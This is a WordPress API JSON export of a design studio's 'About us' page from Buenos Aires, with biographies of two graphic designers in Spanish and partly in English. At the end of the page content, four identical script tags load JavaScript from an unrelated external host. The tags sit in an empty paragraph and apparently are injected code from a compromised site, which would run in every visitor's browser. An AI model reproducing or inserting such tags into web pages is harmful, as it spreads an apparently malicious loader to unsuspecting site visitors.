{"id":290,"date":"2014-01-25T13:23:15","date_gmt":"2014-01-25T13:23:15","guid":{"rendered":"http:\/\/www.estudiodosrios.com.ar\/?page_id=290"},"modified":"2014-01-25T13:23:15","modified_gmt":"2014-01-25T13:23:15","slug":"nosotros","status":"publish","type":"page","link":"https:\/\/www.estudiodosrios.com.ar\/eng\/nosotros\/","title":{"rendered":"We"},"content":{"rendered":"<p><strong>Somos dise\u00f1adores gr\u00e1ficos especializados en la comunicaci\u00f3n visual de proyectos\u00a0vinculados al \u00e1mbito cultural, la\u00a0educaci\u00f3n y la investigaci\u00f3n-acci\u00f3n para el desarrollo humano.<\/strong><\/p>\n<p>\u200bCapacitados para actuar en materia de gesti\u00f3n y producci\u00f3n de herramientas para la difusi\u00f3n, promoci\u00f3n y divulgaci\u00f3n a fin de potenciar el desarrollo de las instituciones, organizaciones y grupos relacionados a los campos mencionados.<\/p>\n<p>\u200bAbordamos el proyecto desde una mirada integral, centrada en el usuario, construida desde m\u00faltiples saberes y capacidades. Partimos de la escucha en profundidad de las necesidades del comitente, priorizando el aspecto humano y\u00a0profesional en cada proyecto.<\/p>\n<div style=\"max-width: 43%; float: left; padding: 0px 0px 5px 0px; margin: 30px 0px 5px 0px;\">\n<p><strong style=\"font-size: 12px; text-transform: uppercase; color: #333; font-family: 'Hammersmith One',sans-serif;\">dg. Florencia Croccia<\/strong><br \/>\n<span style=\"font-size: 12px; color: #333;\">Es graduada de la carrera de Dise\u00f1o Gr\u00e1fico de la Facultad de Arquitectura, Dise\u00f1o y Urbanismo de la Universidad de Buenos Aires, donde trabaja\u00a0como docente en el Taller de Dise\u00f1o Gr\u00e1fico desde 2004.<\/span><\/p>\n<p><span style=\"font-size: 12px; color: #333;\">Se ha desarrollado como profesional en el \u00e1mbito de la gesti\u00f3n p\u00fablica en el equipo de dise\u00f1o editorial de la Direcci\u00f3n General de Patrimonio del gobierno de la Ciudad; en la Secretar\u00eda de Comunicaci\u00f3n y Medios de la FADU. Actualmente coordina el \u00e1rea de comunicaci\u00f3n del Instituto de Tiempo Libre y Recreaci\u00f3n.<\/span><\/p>\n<p><span style=\"font-size: 12px; color: #333;\">Ha desarrollado talleres en proyectos acad\u00e9micos interdisciplinarios como el Taller Libre de Proyecto Social\/ FADU, taller de formaci\u00f3n e integraci\u00f3n de estudiantes y docentes con la comunidad; en Comunicaci\u00f3n+Desarrollo Humano, organizaci\u00f3n que trabaja sobre la producci\u00f3n de herramientas de comunicaci\u00f3n sobre el h\u00e1bitat popular en barrios del AMBA; a trav\u00e9s del Ministerio de Desarrollo Social en la pcia. de C\u00f3rdoba y a trav\u00e9s de la c\u00e1tedra Rico en la Universidad de la Rep\u00fablica de Uruguay.<\/span><\/p>\n<p><span style=\"font-size: 12px; color: #333;\">Se est\u00e1 formando como licenciada en Artes Visuales\u00a0en la Universidad Nacional de las Artes.<\/span><\/p>\n<\/div>\n<div style=\"max-width: 43%; float: left; padding: 0px 0px 0px 15px; margin: 30px 0px 0px 15px;\">\n<p><strong style=\"text-transform: uppercase; font-size: 12px; color: #333; font-family: 'Hammersmith One',sans-serif;\">dg. Gast\u00f3n Mato<\/strong><br \/>\n<span style=\"font-size: 12px; color: #333;\">Es graduado de la carrera de Dise\u00f1o Gr\u00e1fico de la Facultad de Arquitectura, Dise\u00f1o y Urbanismo de la Universidad de Buenos Aires.<\/span><\/p>\n<p><span style=\"font-size: 12px; color: #333;\">Since 1996 he has worked in the field of web development, working for the private sector for companies of all types and scales. He has developed electronic commerce applications, e-learning, email marketing campaigns, social networks and web positioning.<\/span><\/p>\n<p><span style=\"font-size: 12px; color: #333;\">Since 2007 he has been a teacher at the Graphic Design Workshop at FADU, where he completed a Specialization degree in University Teaching.<\/span><\/p>\n<p><span style=\"font-size: 12px; color: #333;\">Ha participado del Seminario Interdisciplinario para la Urgencia Social. Integrante\u00a0como investigador en diferentes equipos, ha colaborado en proyectos tales como &#8220;Dise\u00f1o para el Desarrollo Local&#8221; y &#8220;Mapa digital del Dise\u00f1o en la Ciudad de Buenos Aires&#8221;. Se est\u00e1 capacitando en El Centro de Innovaci\u00f3n en Tecnolog\u00eda y Pedagog\u00eda (CITEP) de la Secretar\u00eda de Asuntos Acad\u00e9micos del Rectorado de la UBA. Ha presentando publicaciones en jornadas y congresos sobre did\u00e1ctica del proyecto y nuevas tecnolog\u00edas.<\/span><\/p>\n<\/div>\n<p>\u200b<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Somos dise\u00f1adores gr\u00e1ficos especializados en la comunicaci\u00f3n visual de proyectos\u00a0vinculados al \u00e1mbito cultural, la\u00a0educaci\u00f3n y la investigaci\u00f3n-acci\u00f3n para el desarrollo humano. \u200bCapacitados para actuar en materia de gesti\u00f3n y producci\u00f3n&hellip;<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-290","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/pages\/290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/comments?post=290"}],"version-history":[{"count":0,"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/pages\/290\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.estudiodosrios.com.ar\/eng\/wp-json\/wp\/v2\/media?parent=290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}